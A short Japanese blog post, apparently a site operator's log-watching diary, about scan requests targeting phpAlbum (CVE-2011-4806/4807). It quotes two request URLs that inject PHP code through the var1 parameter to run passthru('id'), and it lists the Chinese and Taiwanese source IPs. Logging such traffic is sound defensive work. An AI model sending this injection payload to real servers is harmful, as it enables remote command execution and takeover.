最近のアクセスログ - phpalbumへの攻撃

Published: 2011/12/28

これも多く残ってます。

phpalbumへの攻撃です。

CVE-2011-4806
CVE-2011-4807

このようなリクエスト。スキャン用。

 /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
 /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;

passthruファンクションを使って脆弱性があるサーバーかしらべて、のっとった後はマルウェアをこのサーバーに設置することが目的？

攻撃元はやはりアジア。

IP name AS AS name 国

59.108.108.100 NONE 4847 CNIX-AP_China_Networks_Inter-Exchange CN

202.100.80.21 NONE 4134 CHINANET-BACKBONE_No.31Jin-rong_Street CN

203.72.59.6 NONE 1659 ERX-TANET-ASN1_Tiawan_Academic_Network_(TANet)_Information_Center TW

IP	name	AS	AS name	国
59.108.108.100	NONE	4847	CNIX-AP_China_Networks_Inter-Exchange	CN
202.100.80.21	NONE	4134	CHINANET-BACKBONE_No.31Jin-rong_Street	CN
203.72.59.6	NONE	1659	ERX-TANET-ASN1_Tiawan_Academic_Network_(TANet)_Information_Center	TW

[カテゴリ:botnet観察日記]

by jyake

最近のアクセスログ - phpalbumへの攻撃

TOP

Contents

About cNotes

What's New